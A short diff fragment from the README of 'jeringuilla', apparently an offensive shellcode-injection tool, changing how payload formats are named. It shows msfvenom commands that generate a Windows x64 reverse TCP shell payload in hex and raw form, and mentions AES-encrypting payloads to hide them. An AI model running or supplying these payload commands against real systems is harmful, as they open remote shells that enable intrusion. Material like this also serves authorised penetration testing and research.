ricardojoserf/jeringuilla/README.md

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f c EXITFUNC=thread | grep '\x' | tr -d '"\n\\x;'
 ```

-Example - Create payload in raw format for url option using Msfvenom with:
+Example - Create payload in RAW format for url option using Msfvenom with:

 ```
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 EXITFUNC=thread -f bin > payload.bin
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 EXITFUNC=thread -f raw > payload.bin
 ```

 --------------------------------------

 ### AES Encryption

-Both the HEX and raw payloads in previous examples can be encrypted using AES with payloadEncryptor.exe.
+Both the HEX and RAW payloads in previous examples can be encrypted using AES with payloadEncryptor.exe.

 To change the AES password and IV you must update these variables in both jeringa and payloadEncryptor code: